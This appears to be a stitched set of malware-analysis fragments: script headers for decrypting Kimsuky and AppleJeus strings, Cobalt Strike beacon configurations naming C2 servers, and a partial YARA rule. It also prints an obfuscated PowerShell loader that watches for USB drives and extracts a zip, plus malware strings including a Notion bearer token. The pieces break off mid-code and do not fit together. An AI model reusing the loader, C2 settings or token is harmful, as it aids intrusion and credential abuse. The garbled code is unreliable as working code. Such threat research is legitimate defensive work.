#!/usr/bin/env python3
#
# Author: @jaydinbas
# Decrypt strings found in Kimsuky sample
# Reference: https://twitter.com/ShadowChasing1/status/1570601703598338049
# Reference sample: d3930b2494f45bb2c169124d4a39308303b9e8e87043afc54327c1e2a378e4e0
#
import re
import sys

Accept-Encoding
gzip,deflate
Method
POST
win
desktop
art-pc
/
id=
&mail=

BeaconType - HTTP
Port - 80
SleepTime - 45000
MaxGetSize - 1403644
Jitter - 37
MaxDNS - Not Found
PublicKey_MD5 - 005a71d162794e4bc436f8a38e017910
C2Server - 20.203.182.34,/jwquery-3.3.1.min.js
UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
HttpPostUri - /jwquery-3.3.2.min.js

BeaconType - HTTP
Port - 80
SleepTime - 30000
MaxGetSize - 1412693
Jitter - 37
MaxDNS - Not Found
PublicKey_MD5 - 319f36ab624b44c836f42decabcfcb6c
C2Server - solar.huawei.com,/audiencemanager.js
UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4044.62 Safari/537.36
HttpPostUri - /audiencemanager-v2.js

(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
NyQErrorActionPreference=zCwContinuezCw;
NyQa=zCwap'+'i.telegram.orgzCw;
do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
Ny'+'QAction = {
(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
'+' if(NyQnull'+' -eq NyQ_){return}
'+'
try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{

#!/usr/bin/env python3
#
# Author: @jaydinbas
#
# Custom string decryption used by AppleJeus malware
# See https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/
#
# Reference sample: 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78
# Found in function sub_180001830

BeaconType - SMB
Port - 4444
SleepTime - 10000
MaxGetSize - 2097152
Jitter - 0
MaxDNS - 0
PublicKey_MD5 - 5b37cfe101c82935e6034078db979280
C2Server -
UserAgent -
HttpPostUri -

rule zip_with_ext
{
    meta:
        author = "@jaydinbas"
        description = "Only match zip files containing desired file extensions"
    strings:
        $file_sig = "PK\x03\x04"  // zip local file header signature
        $entry_sig = "PK\x01\x02" // ZIPDIRENTRY (central directory entry) signature

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
c:\windows\system32\
content-type: application/json
accept: application/json
notion-version: 2022-06-28
authorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s
api.notion.com
GetProcessImageFileNameA
RegOpenKeyExA
RegSetValueExA

BeaconType - HTTPS
Port - 443
SleepTime - 60000
MaxGetSize - 1398104
Jitter - 30
MaxDNS - Not Found
PublicKey_MD5 - 4dbaa2821fcfa995554ad7612a869a6d
C2Server - exdiy.com,/web/portal
UserAgent - Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
HttpPostUri - /logon/index.php